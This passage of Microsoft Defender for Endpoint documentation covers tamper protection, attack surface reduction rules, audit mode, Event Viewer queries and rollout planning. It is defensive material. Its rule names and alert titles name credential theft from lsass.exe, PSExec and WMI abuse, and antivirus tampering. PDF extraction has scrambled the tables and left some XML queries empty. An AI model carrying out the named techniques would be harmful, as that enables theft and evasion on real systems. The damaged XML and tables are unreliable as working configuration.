protected code integrity or HVCI), Smart App Control, or S mode to be active.
See Microsoft vulnerable driver blocklist.
For devices that don't meet those requirements, this list of drivers can be blocked by
using Windows Defender Application Control policy.
See Vulnerable Driver blocklist XML.
Faster updates - Block exploited vulnerable and signed

drivers ASR rule
This list of drivers blocked by the exploited and vulnerable drivers get updated more
frequently than the recommended drivers blocklist. ASR rules can run in audit mode first
to ensure that there's no impact before applying the rule in block mode.
See Block abuse of exploited vulnerable signed drivers rule.
Block other drivers - Windows Defender Application

Control (WDAC)
Attackers might attempt to use drivers that aren't blocked by either the recommended
driver blocklist or an ASR rule. In this case, customers can protect themselves by using
WDAC to create a policy to block
WDAC also provides an audit mode to help understand the impact of applying the
policy in block mode to avoid accidentally impacting legitimate use.
Preventing tampering via Microsoft Defender

Antivirus exclusions on Windows
A common technique used by attackers is to make unauthorized changes to anti-virus
exclusions. Tamper protection prevents such attacks from occurring when all of the
following conditions are met:
The device is managed by Intune; and

The device has Disable Local Admin Merge enabled.
For more information, see Tamper protection for antivirus exclusions.
Attackers can be preventing from discovering existing antivirus exclusions by enabling

HideExclusionsFromLocalAdmin.
Detecting potential tampering activity in the

Microsoft Defender portal
When tampering is detected, an alert is raised. Some of the alert titles for tampering are:
Attempt to bypass Microsoft Defender for Endpoint client protection

Attempt to stop Microsoft Defender for Endpoint sensor
Attempt to tamper with Microsoft Defender on multiple devices
Attempt to turn off Microsoft Defender Antivirus protection
Defender detection bypass
Driver-based tampering attempt blocked
Image file execution options set for tampering purposes
Microsoft Defender Antivirus protection turned off
Microsoft Defender Antivirus tampering
Modification attempt in Microsoft Defender Antivirus exclusion list
Pending file operations mechanism abused for tampering purposes
Possible Antimalware Scan Interface (AMSI) tampering
Possible remote tampering
Possible sensor tampering in memory
Potential attempt to tamper with MDE via drivers
Security software tampering
Suspicious Microsoft Defender Antivirus exclusion
Tamper protection bypass
Tampering activity typical to ransomware attacks
Tampering with Microsoft Defender for Endpoint sensor communication
Tampering with Microsoft Defender for Endpoint sensor settings
Tampering with the Microsoft Defender for Endpoint sensor
If the Block abuse of exploited vulnerable signed drivers attack surface reduction rule is
triggered, the event is viewable in the ASR Report and in Advanced Hunting
If Windows Defender Application Control (WDAC) is enabled, the block and audit activity
can be seen in Advanced Hunting.
 Tip
Feedback

Understand and use attack surface
reduction capabilities
Article • 09/29/2023
Applies to:

Platforms
Windows
 Tip
Attack surfaces are all the places where your organization is vulnerable to cyberthreats
and attacks. Defender for Endpoint includes several capabilities to help reduce your
attack surfaces. Watch the following video to learn more about attack surface reduction.
https://www.microsoft.com/en-us/videoplayer/embed/RE4woug?postJsllMsg=true
Configure attack surface reduction capabilities

To configure attack surface reduction in your environment, follow these steps:
1. Enable hardware-based isolation for Microsoft Edge.
2. Enable attack surface reduction rules
3. Enable application control.

a. Review base policies in Windows. See Example Base Policies.
b. See the Windows Defender Application Control design guide.
c. Refer to Deploying Windows Defender Application Control (WDAC) policies.
4. Enable controlled folder access.
5. Enable removable storage protection
6. Turn on network protection.

7. Enable Web protection
8. Enable exploit protection.
9. Set up your network firewall.

a. Get an overview of Windows Firewall with advanced security.
b. Use the Windows Firewall design guide to decide how you want to design your
firewall policies.
c. Use the Windows Firewall deployment guide to set up your organization's
firewall with advanced security.
 Tip
In most cases, when you configure attack surface reduction capabilities, you can
choose from among several methods:
Microsoft Intune
Group Policy
PowerShell cmdlets
Test attack surface reduction in Microsoft

As part of your organization's security team, you can configure attack surface reduction
capabilities to run in audit mode to see how they work. You can enable the following
attack surface reduction security features in audit mode:

Exploit protection
Network protection
Device control
Audit mode lets you see a record of what would have happened if you had enabled the
feature.
You can enable audit mode when testing how the features work. Enabling audit mode
only for testing helps to prevent audit mode from affecting your line-of-business apps.
You can also get an idea of how many suspicious file modification attempts occur over a
certain period of time.
The features don't block or prevent apps, scripts, or files from being modified. However,
the Windows Event Log records events as if the features were fully enabled. With audit
mode, you can review the event log to see what effect the feature would have had if it
was enabled.
To find the audited entries, go to Applications and Services > Microsoft > Windows >
Windows Defender > Operational.
Use Defender for Endpoint to get greater details for each event. These details are
especially helpful for investigating attack surface reduction rules. Using the Defender for
Endpoint console lets you investigate issues as part of the alert timeline and
investigation scenarios.
You can enable audit mode using Group Policy, PowerShell, and configuration service
providers (CSPs).
ﾉ Expand table
Audit options How to enable audit mode How to view events
Audit applies to all Enable controlled folder access Controlled folder access events
events
Audit applies to Step 1: Test attack surface Step 2: Understand the Attack
individual rules reduction rules using Audit surface reduction rules reporting
mode page
Audit applies to all Enable network protection Network protection events

events
Audit applies to Enable exploit protection Exploit protection events

individual mitigations
For example, you can test attack surface reduction rules in audit mode prior to enabling
(block mode) them. Attack surface reduction rules are predefined to harden common,
known attack surfaces. There are several methods you can use to implement attack
surface reduction rules. The preferred method is documented in the following attack
surface reduction rules deployment articles:
Attack surface reduction rules deployment overview

Plan attack surface reduction rules deployment
Test attack surface reduction rules
Enable attack surface reduction rules
Operationalize attack surface reduction rules
View attack surface reduction events
Review attack surface reduction events in Event Viewer to monitor what rules or settings
are working. You can also determine if any settings are too "noisy" or impacting your
day to day workflow.
Reviewing events is handy when you're evaluating the features. You can enable audit
mode for features or settings, and then review what would have happened if they were
fully enabled.
This section lists all the events, their associated feature or setting, and describes how to
create custom views to filter to specific events.
Get detailed reporting into events, blocks, and warnings as part of Windows Security if
you have an E5 subscription and use Microsoft Defender for Endpoint.
Use custom views to review attack surface reduction

capabilities
Create custom views in the Windows Event Viewer to only see events for specific
capabilities and settings. The easiest way is to import a custom view as an XML file. You
can copy the XML directly from this page.
You can also manually navigate to the event area that corresponds to the feature.
Import an existing XML custom view

1. Create an empty .txt file and copy the XML for the custom view you want to use
into the .txt file. Do this for each of the custom views you want to use. Rename the
files as follows (ensure you change the type from .txt to .xml):
Controlled folder access events custom view: cfa-events.xml

Exploit protection events custom view: ep-events.xml
Attack surface reduction events custom view: asr-events.xml
Network/ protection events custom view: np-events.xml
2. Type event viewer in the Start menu and open Event Viewer.
3. Select Action > Import Custom View...

4. Navigate to where you extracted the XML file for the custom view you want and
select it.
5. Select Open.
6. It creates a custom view that filters to only show the events related to that feature.
Copy the XML directly
1. Type event viewer in the Start menu and open the Windows Event Viewer.
2. On the left panel, under Actions, select Create Custom View...

3. Go to the XML tab and select Edit query manually. You see a warning that you
can't edit the query using the Filter tab if you use the XML option. Select Yes.
4. Paste the XML code for the feature you want to filter events from into the XML
section.
5. Select OK. Specify a name for your filter. This action creates a custom view that
filters to only show the events related to that feature.
XML for attack surface reduction rule events
XML
<QueryList>
<Query Id="0" Path="Microsoft-Windows-Windows Defender/Operational">
<Select Path="Microsoft-Windows-Windows Defender/Operational">*
[System[(EventID=1121 or EventID=1122 or EventID=5007)]]</Select>
<Select Path="Microsoft-Windows-Windows Defender/WHC">*
</Query>
</QueryList>
XML for controlled folder access events
XML
<QueryList>
</Query>
</QueryList>
XML for exploit protection events
XML
<QueryList>
<Query Id="0" Path="Microsoft-Windows-Security-Mitigations/KernelMode">
<Select Path="Microsoft-Windows-Security-Mitigations/KernelMode">*
[System[Provider[@Name='Microsoft-Windows-Security-Mitigations' or
@Name='Microsoft-Windows-WER-Diag' or @Name='Microsoft-Windows-Win32k' or
@Name='Win32k'] and ( (EventID >= 1 and EventID <= 24) or EventID=5
or EventID=260)]]</Select>
<Select Path="Microsoft-Windows-Win32k/Concurrency">*
<Select Path="Microsoft-Windows-Win32k/Contention">*
<Select Path="Microsoft-Windows-Win32k/Messages">*
<Select Path="Microsoft-Windows-Win32k/Operational">*
<Select Path="Microsoft-Windows-Win32k/Power">*
<Select Path="Microsoft-Windows-Win32k/Render">*
<Select Path="Microsoft-Windows-Win32k/Tracing">*
<Select Path="Microsoft-Windows-Win32k/UIPI">*
<Select Path="System">*[System[Provider[@Name='Microsoft-Windows-
Security-Mitigations' or @Name='Microsoft-Windows-WER-Diag' or
@Name='Microsoft-Windows-Win32k' or @Name='Win32k'] and ( (EventID >= 1
and EventID <= 24) or EventID=5 or EventID=260)]]</Select>
<Select Path="Microsoft-Windows-Security-Mitigations/UserMode">*
</Query>
</QueryList>
XML for network protection events

XML
<QueryList>
</Query>
</QueryList>
List of attack surface reduction events

All attack surface reduction events are located under Applications and Services Logs >
Microsoft > Windows and then the folder or provider as listed in the following table.
You can access these events in Windows Event viewer:
1. Open the Start menu and type event viewer, and then select the Event Viewer
result.
2. Expand Applications and Services Logs > Microsoft > Windows and then go to
the folder listed under Provider/source in the table below.
3. Double-click on the sub item to see events. Scroll through the events to find the
one you're looking.
ﾉ Expand table
Feature Provider/source Event Description

ID
Exploit Security-Mitigations (Kernel 1 ACG audit

protection Mode/User Mode)
Exploit Security-Mitigations (Kernel 2 ACG enforce

Exploit Security-Mitigations (Kernel 3 Don't allow child processes audit

Exploit Security-Mitigations (Kernel 4 Don't allow child processes block

Exploit Security-Mitigations (Kernel 5 Block low integrity images audit

Exploit Security-Mitigations (Kernel 6 Block low integrity images block

Exploit Security-Mitigations (Kernel 7 Block remote images audit

Exploit Security-Mitigations (Kernel 8 Block remote images block

Exploit Security-Mitigations (Kernel 9 Disable win32k system calls audit

Exploit Security-Mitigations (Kernel 10 Disable win32k system calls block

Exploit Security-Mitigations (Kernel 11 Code integrity guard audit

Exploit Security-Mitigations (Kernel 12 Code integrity guard block

Exploit Security-Mitigations (Kernel 13 EAF audit

Exploit Security-Mitigations (Kernel 14 EAF enforce

Exploit Security-Mitigations (Kernel 15 EAF+ audit

Exploit Security-Mitigations (Kernel 16 EAF+ enforce

ID
Exploit Security-Mitigations (Kernel 17 IAF audit

Exploit Security-Mitigations (Kernel 18 IAF enforce

Exploit Security-Mitigations (Kernel 19 ROP StackPivot audit

Exploit Security-Mitigations (Kernel 20 ROP StackPivot enforce

Exploit Security-Mitigations (Kernel 21 ROP CallerCheck audit

Exploit Security-Mitigations (Kernel 22 ROP CallerCheck enforce

Exploit Security-Mitigations (Kernel 23 ROP SimExec audit

Exploit Security-Mitigations (Kernel 24 ROP SimExec enforce

Exploit WER-Diagnostics 5 CFG Block

protection
Exploit Win32K (Operational) 260 Untrusted Font

protection
Network Windows Defender 5007 Event when settings are changed

protection (Operational)
Network Windows Defender 1125 Event when Network protection

protection (Operational) fires in Audit-mode
Network Windows Defender 1126 Event when Network protection

protection (Operational) fires in Block-mode
Controlled folder Windows Defender 5007 Event when settings are changed
access (Operational)
Controlled folder Windows Defender 1124 Audited Controlled folder access

access (Operational) event
Controlled folder Windows Defender 1123 Blocked Controlled folder access

access (Operational) event
ID
Controlled folder Windows Defender 1127 Blocked Controlled folder access

access (Operational) sector write block event
Controlled folder Windows Defender 1128 Audited Controlled folder access

access (Operational) sector write block event
Attack surface Windows Defender 5007 Event when settings are changed
reduction (Operational)
Attack surface Windows Defender 1122 Event when rule fires in Audit-
reduction (Operational) mode
Attack surface Windows Defender 1121 Event when rule fires in Block-
reduction (Operational) mode
７ Note
From the user's perspective, attack surface reduction Warn mode notifications are
made as a Windows Toast Notification for attack surface reduction rules.
In attack surface reduction, Network Protection provides only Audit and Block
modes.
Resources to learn more about attack surface

reduction
As mentioned in the video, Defender for Endpoint includes several attack surface
reduction capabilities. Use the following resources to learn more:
ﾉ Expand table
Article Description
Application control Use application control so that your applications must earn trust in order
to run.
Attack surface Provides details about each attack surface reduction rule.
reduction rules
reference
Attack surface Presents overview information and prerequisites for deploying attack
reduction rules surface reduction rules, followed by step-by-step guidance for testing
Article Description
deployment guide (audit mode), enabling (block mode) and monitoring.
Controlled folder Help prevent malicious or suspicious apps (including file-encrypting

access ransomware malware) from making changes to files in your key system
folders (Requires Microsoft Defender Antivirus).
Device control Protects against data loss by monitoring and controlling media used on
devices, such as removable storage and USB drives, in your organization.
Exploit protection Help protect the operating systems and apps your organization uses
from being exploited. Exploit protection also works with third-party
antivirus solutions.
Hardware-based Protect and maintain the integrity of a system as it starts and while it's
isolation running. Validate system integrity through local and remote attestation.
Use container isolation for Microsoft Edge to help guard against
malicious websites.
Network protection Extend protection to your network traffic and connectivity on your
organization's devices. (Requires Microsoft Defender Antivirus).
Test attack surface Provides steps to use audit mode to test attack surface reduction rules.
reduction rules
Web protection Web protection lets you secure your devices against web threats and
helps you regulate unwanted content.
 Tip
Feedback

Attack surface reduction rules overview
Article • 11/22/2023
Applies to:

Platforms
Windows
Why attack surface reduction rules are

important
Your organization's attack surface includes all the places where an attacker could
compromise your organization's devices or networks. Reducing your attack surface
means protecting your organization's devices and network, which leaves attackers with
fewer ways to perform attacks. Configuring attack surface reduction rules in Microsoft
Defender for Endpoint can help!
Attack surface reduction rules target certain software behaviors, such as:
Launching executable files and scripts that attempt to download or run files
Performing behaviors that apps don't usually initiate during normal day-to-day
work
Such software behaviors are sometimes seen in legitimate applications. However, these
behaviors are often considered risky because they're commonly abused by attackers
through malware. Attack surface reduction rules can constrain software-based risky
behaviors and help keep your organization safe.
For a sequential, end-to-end process of how to manage attack surface reduction rules,
see:

Assess rules before deployment

You can assess how an attack surface reduction rule might affect your network by
opening the security recommendation for that rule in Microsoft Defender Vulnerability
Management.
In the recommendation details pane, check for user impact to determine what
percentage of your devices can accept a new policy enabling the rule in blocking mode
without adversely affecting productivity.
See Requirements in the "Enable attack surface reduction rules" article for information
about supported operating systems and other requirement information.
Audit mode for evaluation
Audit mode
Use audit mode to evaluate how attack surface reduction rules would affect your
organization if enabled. Run all rules in audit mode first so you can understand how
they affect your line-of-business applications. Many line-of-business applications are
written with limited security concerns, and they might perform tasks in ways that seem
similar to malware.
Exclusions
By monitoring audit data and adding exclusions for necessary applications, you can
deploy attack surface reduction rules without reducing productivity.
Per-rule exclusions
For information about configuring per-rule exclusions, see the section titled Configure
attack surface reduction rules per-rule exclusions in the article Test attack surface
reduction rules.
Warn mode for users

(NEW!) Prior to warn mode capabilities, attack surface reduction rules that are enabled
could be set to either audit mode or block mode. With the new warn mode, whenever
content is blocked by an attack surface reduction rule, users see a dialog box that
indicates the content is blocked. The dialog box also offers the user an option to
unblock the content. The user can then retry their action, and the operation completes.
When a user unblocks content, the content remains unblocked for 24 hours, and then
blocking resumes.
Warn mode helps your organization have attack surface reduction rules in place without
preventing users from accessing the content they need to perform their tasks.
Requirements for warn mode to work

Warn mode is supported on devices running the following versions of Windows:

Windows 11
Microsoft Defender Antivirus must be running with real-time protection in Active mode.
Also, make sure Microsoft Defender Antivirus and antimalware updates are installed.
Minimum platform release requirement: 4.18.2008.9

Minimum engine release requirement: 1.1.17400.5
For more information and to get your updates, see Update for Microsoft Defender
antimalware platform .
Cases where warn mode isn't supported

Warn mode isn't supported for three attack surface reduction rules when you configure
them in Microsoft Intune. (If you use Group Policy to configure your attack surface
reduction rules, warn mode is supported.) The three rules that don't support warn mode
when you configure them in Microsoft Intune are as follows:
Block JavaScript or VBScript from launching downloaded executable content (GUID

d3e037e1-3eb8-44c8-a917-57927947596d )
Block persistence through WMI event subscription (GUID e6db77e5-3df2-4cf1-

b95a-636979351e5b )
Use advanced protection against ransomware (GUID c1db55ab-c21a-4637-bb3f-

a12568109d35 )
Also, warn mode isn't supported on devices running older versions of Windows. In those
cases, attack surface reduction rules that are configured to run in warn mode runs in
block mode.
Notifications and alerts

Whenever an attack surface reduction rule is triggered, a notification is displayed on the
device. You can customize the notification with your company details and contact
information.
Also, when certain attack surface reduction rules are triggered, alerts are generated.
Notifications and any alerts that are generated can be viewed in the Microsoft Defender
portal .
For specific details about notification and alert functionality, see: Per rule alert and
notification details, in the article Attack surface reduction rules reference.
Advanced hunting and attack surface reduction

events
You can use advanced hunting to view attack surface reduction events. To streamline the
volume of incoming data, only unique processes for each hour are viewable with
advanced hunting. The time of an attack surface reduction event is the first time that
event is seen within the hour.
For example, suppose that an attack surface reduction event occurs on 10 devices
during the 2:00 PM hour. Suppose that the first event occurred at 2:15, and the last at
2:45. With advanced hunting, you see one instance of that event (even though it actually
occurred on 10 devices), and its timestamp will be 2:15 PM.
For more information about advanced hunting, see Proactively hunt for threats with
advanced hunting.
Attack surface reduction features across

Windows versions
You can set attack surface reduction rules for devices that are running any of the
following editions and versions of Windows:
Windows 10 Pro, version 1709 or later
Windows 10 Enterprise, version 1709 or later
Windows Server, version 1803 (Semi-Annual Channel) or later
Windows Server 2022
Windows Server 2019
Windows Server 2016
７ Note

feature to work.
Although attack surface reduction rules don't require a Windows E5 license, if you have
Windows E5, you get advanced management capabilities. The advanced capabilities -
available only in Windows E5 - include:
The monitoring, analytics, and workflows available in Defender for Endpoint

The reporting and configuration capabilities in Microsoft Defender XDR.
These advanced capabilities aren't available with a Windows Professional or Windows E3

license. However, if you do have those licenses, you can use Event Viewer and Microsoft
Defender Antivirus logs to review your attack surface reduction rule events.
Review attack surface reduction events in the
Defender for Endpoint provides detailed reporting for events and blocks as part of alert
You can query Defender for Endpoint data in Microsoft Defender XDR by using
advanced hunting.
Here's an example query:
Kusto
DeviceEvents
| where ActionType startswith 'Asr'
Review attack surface reduction events in

Windows Event Viewer
You can review the Windows event log to view events generated by attack surface
reduction rules:
1. Download the Evaluation Package and extract the file cfa-events.xml to an easily
accessible location on the device.
2. Enter the words, Event Viewer, into the Start menu to open the Windows Event
Viewer.
3. Under Actions, select Import custom view....
4. Select the file cfa-events.xml from where it was extracted. Alternatively, copy the
XML directly.
5. Select OK.
You can create a custom view that filters events to only show the following events, all of
which are related to controlled folder access:
ﾉ Expand table
Event ID Description
5007 Event when settings are changed

1121 Event when rule fires in Block-mode
1122 Event when rule fires in Audit-mode
The "engine version" listed for attack surface reduction events in the event log, is
generated by Defender for Endpoint, not by the operating system. Defender for
Endpoint is integrated with Windows 10 and Windows 11, so this feature works on all
devices with Windows 10 or Windows 11 installed.
See also
Attack surface reduction rules report
 Tip
If you're looking for Antivirus related information for other platforms, see:

macOS Antivirus policy settings for Microsoft Defender Antivirus for Intune
Set preferences for Microsoft Defender for Endpoint on Linux
Configure Defender for Endpoint on Android features
 Tip
Feedback

deployment overview
Article • 02/16/2024
Applies to:

Attack surfaces are all the places where your organization is vulnerable to cyberthreats
and attacks. Reducing your attack surface means protecting your organization's devices
and network, which leaves attackers with fewer ways to attack. Configuring Microsoft
Defender for Endpoint attack surface reduction rules can help.
Attack surface reduction rules target certain software behaviors, such as:
Behaviors that apps don't usually occur during normal day-to-day work
By reducing the different attack surfaces, you can help prevent attacks from happening
in the first place.
This deployment collection provides information about the following aspects of attack
surface reduction rules:
attack surface reduction rules requirements

plan for attack surface reduction rules deployment
test attack surface reduction rules
configure and enable attack surface reduction rules
attack surface reduction rules best practices
attack surface reduction rules advanced hunting
attack surface reduction rules event viewer
Attack surface reduction rules deployment

steps
As with any new, wide-scale implementation, which could potentially impact your line-
of-business operations, it's important to be methodical in your planning and
implementation. Careful planning and deployment of attack surface reduction rules is
necessary to ensure they work best for your unique customer workflows. To work in your
environment, you need to plan, test, implement, and operationalize attack surface
reduction rules carefully.
Important predeployment caveat

We recommended that you enable the following three standard protection rules. See
Attack surface reduction rules by type for important details about the two types of
attack surface reduction rules.
Block credential stealing from the Windows local security authority subsystem
(lsass.exe)
Block abuse of exploited vulnerable signed drivers
Block persistence through Windows Management Instrumentation (WMI) event
subscription
Typically, you can enable the standard protection rules with minimal-to-no noticeable
impact to the end user. For an easy method to enable the standard protection rules, see
Simplified standard protection option.
７ Note
For customers who are using a non-Microsoft HIPS and are transitioning to
Microsoft Defender for Endpoint attack surface reduction rules, Microsoft advises
running the HIPS solution alongside attack surface reduction rules deployment until
the moment you shift from Audit mode to Block mode. Keep in mind that you must
reach out to your non-Microsoft antivirus provider for exclusion recommendations.
Before you begin testing or enabling attack

surface reduction rules
During your initial preparation, it's vital to understand the capabilities of the systems
that you put in place. Understanding the capabilities help you determine which attack
surface reduction rules are most important for protecting your organization.
Additionally, there are several prerequisites, which you must attend to in preparation of
your attack surface reduction deployment.
） Important
This guide provides images and examples to help you decide how to configure
attack surface reduction rules; these images and examples might not reflect the
best configuration options for your environment.
Before you start, review Overview of attack surface reduction, and Demystifying attack
surface reduction rules - Part 1 for foundational information. To understand the areas
of coverage and potential impact, familiarize yourself with the current set of attack
surface reduction rules; see Attack surface reduction rules reference. While you're
familiarizing yourself with the attack surface reduction rules set, take note of the per-
rule GUID mappings; see Attack surface reduction rule to GUID matrix.
Attack surface reduction rules are only one capability of the attack surface reduction
capabilities within Microsoft Defender for Endpoint. This document goes into more
detail on deploying attack surface reduction rules effectively to stop advanced threats
like human-operated ransomware and other threats.
Attac surface reduction rules list by category

The following table shows attack surface reduction rules by category:
ﾉ Expand table
Polymorphic Lateral Productivity Email rules Script rules Misc rules
threats movement apps rules
&
credential
theft
Block Block Block Office Block Block obfuscated Block

executable process apps from executable JS/VBS/PS/macro abuse of
files from creations creating content from code exploited
running originating executable email client and vulnerable
unless they from PSExec content webmail signed
meet a and WMI drivers [1]
prevalence commands
(1,000
machines),
age, or
trusted list
criteria
Block Block Block Office Block only Block JS/VBS

untrusted and credential apps from Office from launching
unsigned stealing creating communication downloaded
processes from the child applications executable
that run from Windows processes from creating content
USB local child processes
security
authority
subsystem
(lsass.exe)[2]
Use advanced Block Block Office Block Office

protection persistence apps from communication
against through injecting apps from
ransomware WMI event code into creating child
subscription other processes
processes
Block Adobe
Reader from
creating
child
processes
(1) Block abuse of exploited vulnerable signed drivers is now available under Endpoint
Security > Attack Surface Reduction.
(2) Some attack surface reduction rules generate considerable noise, but don't block
functionality. For example, if you're updating Chrome, Chrome accesses lsass.exe;
passwords are stored in lsass on the device. However, Chrome shouldn't be accessing
local device lsass.exe. If you enable the rule to block access to lsass, you see many
events. Those events are good events because the software update process shouldn't
access lsass.exe. Using this rule blocks Chrome updates from accessing lsass, but won't
block Chrome from updating. This is also true of other applications that make
unnecessary calls to lsass.exe. The block access to lsass rule blocks unnecessary calls to
lsass, but doesn't block the application from running.
Attack surface reduction infrastructure requirements

Although multiple methods of implementing attack surface reduction rules are possible,
this guide is based on an infrastructure consisting of
Microsoft Entra ID
Microsoft Intune
Windows 10 and Windows 11 devices
Microsoft Defender for Endpoint E5 or Windows E5 licenses
To take full advantage of attack surface reduction rules and reporting, we recommend
using a Microsoft Defender XDR E5 or Windows E5 license, and A5. Learn more at
Minimum requirements for Microsoft Defender for Endpoint.
７ Note
There are multiple methods to configure attack surface reduction rules. Attack
surface reduction rules can be configured using: Microsoft Intune, PowerShell,
Group Policy, Microsoft Configuration Manager (ConfigMgr), Intune OMA-URI. If
you are using a different infrastructure configuration than what is listed for
Infrastructure requirements, you can learn more about deploying attack surface
reduction rules using other configurations here: Enable attack surface reduction
rules.
Attack surface reduction rules dependencies

Microsoft Defender Antivirus must be enabled and configured as primary anti-virus
solution, and must be in the following mode:
Primary antivirus/antimalware solution

State: Active mode
Microsoft Defender Antivirus must not be in any of the following modes:
Passive
Passive Mode with Endpoint detection and response (EDR) in Block Mode
Limited periodic scanning (LPS)
Off
See Cloud-delivered protection and Microsoft Defender Antivirus for more.
Cloud Protection (MAPS) must be enabled to enable

attack surface reduction rules
Microsoft Defender Antivirus works seamlessly with Microsoft cloud services. These
cloud protection services, also referred to as Microsoft Advanced Protection Service
(MAPS), enhances standard real-time protection, arguably providing the best antivirus
defense. Cloud protection is critical to preventing breaches from malware and a critical
component of attack surface reduction rules. Turn on cloud-delivered protection in
Microsoft Defender Antivirus components must be

current versions for attack surface reduction rules
The following Microsoft Defender Antivirus component versions must be no more than
two versions older than the most-currently-available version:
Microsoft Defender Antivirus Platform update version - Microsoft Defender

Antivirus platform is updated monthly.
Microsoft Defender Antivirus engine version - Microsoft Defender Antivirus
engine is updated monthly.
Microsoft Defender Antivirus security intelligence - Microsoft continually updates
Microsoft Defender security intelligence (also known as, definition and signature)
to address the latest threats, and to refine detection logic.
Keeping Microsoft Defender Antivirus versions current helps reduce attack surface
reduction rules false positive results and improves Microsoft Defender Antivirus
detection capabilities. For more details on the current versions and how to update the
different Microsoft Defender Antivirus components visit Microsoft Defender Antivirus
platform support.
Caveat
Some rules don't work well if unsigned, internally developed application and scripts are
in high usage. It's more difficult to deploy attack surface reduction rules if code signing
isn't enforced.
Other articles in this deployment collection
Reference
Blogs
Demystifying attack surface reduction rules - Part 1
Attack surface reduction rules collection

Overview of attack surface reduction
Use attack surface reduction rules to prevent malware infection
Enable attack surface reduction rules - alternate configurations
Attack surface reduction FAQ
Microsoft Defender
Cloud-delivered protection and Microsoft Defender Antivirus
Turn on cloud-delivered protection in Microsoft Defender Antivirus
Configure and validate exclusions based on extension, name, or location
Microsoft Defender Antivirus platform support

Overview of inventory in the Microsoft 365 Apps admin center
Create a deployment plan for Windows
Use role-based access control (RBAC) and scope tags for distributed IT in Intune
Assign device profiles in Microsoft Intune
Management sites
Microsoft Intune admin center
Attack surface reduction rules configurations
Attack surface reduction rules exclusions
 Tip
Feedback

Plan attack surface reduction rules
deployment
Article • 09/29/2023
Applies to:

Before you test or enable attack surface reduction rules, you should plan your
deployment. Careful planning helps you test your attack surface reduction rules
deployment and get ahead of any rule exceptions. When planning to test attack surface
reduction rules, make sure you start with the right business unit. Start with a small group
of people in a specific business unit. You can identify some champions within a
particular business unit who can provide feedback to help tune your implementation.
） Important
While you're going through the process of planning, auditing, and enable attack
surface reduction rules, it's recommended that you enable the following three
standard protection rules. See Attack surface reduction rules by type for important
details about the two types of attack surface reduction rules.
Block credential stealing from the Windows local security authority

subsystem (lsass.exe)
Block persistence through Windows Management Instrumentation (WMI)
event subscription
You can typically enable the standard protection rules with minimal noticeable
impact to the end user. For an easy method to enable the standard protection
rules, see: Simplified standard protection option.
Start your ASR rules deployment with the right
business unit
How you select the business unit to roll out your attack surface reduction rules
deployment depends on factors such as:
Size of business unit

Availability of attack surface reduction rules champions
Distribution and usage of:
Software
Shared folders
Use of scripts
Office macros
Other entities affected by attack surface reduction rules
Depending on your business needs, you might decide to include multiple business units
to get a broad sampling of software, shared folders, scripts, macros, etc. You might
decide to limit the scope of your first attack surface reduction rules rollout to a single
business unit. Then, repeat the entire attack surface reduction rules rollout process to
your other business units, one-at-a-time.
Identify ASR rules champions

Attack surface reduction rules champions are members in your organization who can
help with your initial attack surface reduction rules rollout during the preliminary testing
and implementation phases. Your champions are typically employees who are more
technically adept, and who aren't derailed by intermittent work-flow outages. The
champions' involvement continues throughout the broader expansion of attack surface
reduction rules deployment to your organization. Your attack surface reduction rules
champions are first to experience each level of the attack surface reduction rules rollout.
It's important to provide a feedback and response channel for your attack surface
reduction rules champions to alert you to attack surface reduction rules-related work
disruptions and receive attack surface reduction rules-rollout related communications.
Get inventory of line-of-business apps and

understand the business unit processes
Having a full understanding of the applications and per-business-unit processes that are
used across your organization is critical to a successful attack surface reduction rules
deployment. Additionally, it's imperative that you understand how those apps are used
within the various business units in your organization. To start, you should get an
inventory of the apps that are approved for use across the breadth of the organization.
You can use tools such as the Microsoft 365 Apps admin center to help inventory
software applications. See: Overview of inventory in the Microsoft 365 Apps admin
center.
Define reporting and response ASR rules team

roles and responsibilities
Clearly articulating roles and responsibilities of persons responsible for monitoring and
communicating attack surface reduction rules status and activity is a core activity of
attack surface reduction maintenance. Therefore, it's important to determine:
The person or team responsible for gathering reports

How and with whom reports are shared
How escalation is addressed for newly identified threats or unwanted blockages
caused by attack surface reduction rules
Typical roles and responsibilities include:
IT admins: Implement attack surface reduction rules, manage exclusions. Work with
different business units on apps and processes. Assembling and sharing reports to
stakeholders
Certified security operations center (CSOC) analyst: Responsible for investigating
high-priority, blocked processes, to determine whether the threat is valid or not
Chief information security officer (CISO): Responsible for the overall security
posture and health of the organization
ASR rules ring deployment

For large enterprises, Microsoft recommends deploying attack surface reduction rules in
"rings." Rings are groups of devices that are visually represented as concentric circles
that radiate outward like nonoverlapping tree rings. When the innermost ring is
successfully deployed, you can transition to the next ring into the testing phase.
Thorough assessment of your business units, attack surface reduction rules champions,
apps, and processes is imperative to defining your rings. In most cases, your
organization has deployment rings for phased rollouts of Windows updates. You can use
your existing ring design to implement attack surface reduction rules. See: Create a
deployment plan for Windows
 Tip
Feedback

Article • 02/16/2024
Applies to:

Testing Microsoft Defender for Endpoint attack surface reduction rules helps you
determine if rules impede line-of-business operations prior to enabling any rule. By
starting with a small, controlled group, you can limit potential work disruptions as you
expand your deployment across your organization.
In this section of the attack surface reduction rules deployment guide, you'll learn how
to:
configure rules using Microsoft Intune

use Microsoft Defender for Endpoint attack surface reduction rules reports
configure attack surface reduction rules exclusions
enable attack surface reduction rules using PowerShell
use Event Viewer for attack surface reduction rules events
７ Note
Before you begin testing attack surface reduction rules, it is recommended that you
first disable all rules that you have previously set to either audit or enable (if
applicable). See Attack surface reduction rules reports for information about using
the attack surface reduction rules report to disable attack surface reduction rules.
Begin your attack surface reduction rules deployment with ring 1.
Step 1: Test attack surface reduction rules using

Audit
Begin the testing phase by turning on the attack surface reduction rules with the rules
set to Audit, starting with your champion users or devices in ring 1. Typically, the
recommendation is that you enable all the rules (in Audit) so that you can determine
which rules are triggered during the testing phase. Rules that are set to Audit don't
generally impact functionality of the entity or entities to which the rule is applied but do
generate logged events for the evaluation; there is no effect on end users.
Configure attack surface reduction rules using Intune

You can use Microsoft Intune Endpoint Security to configure custom attack surface
reduction rules.
1. Open the Microsoft Intune admin center .
2. Go to Endpoint Security > Attack surface reduction.
4. In Platform, select Windows 10, Windows 11, and Windows Server, and in Profile,
select Attack surface reduction rules.
5. Select Create.
6. In the Basics tab of the Create profile pane, in Name add a name for your policy.
In Description add a description for your attack surface reduction rules policy.
7. In the Configuration settings tab, under Attack Surface Reduction Rules, set all
rules to Audit mode.

７ Note
There are variations in some attack surface reduction rules mode listings;
Blocked and Enabled provide the same functionality.
8. [Optional] In the Scope tags pane, you can add tag information to specific devices.
You can also use role-based access control and scope tags to make sure that the
right admins have the right access and visibility to the right Intune objects. Learn
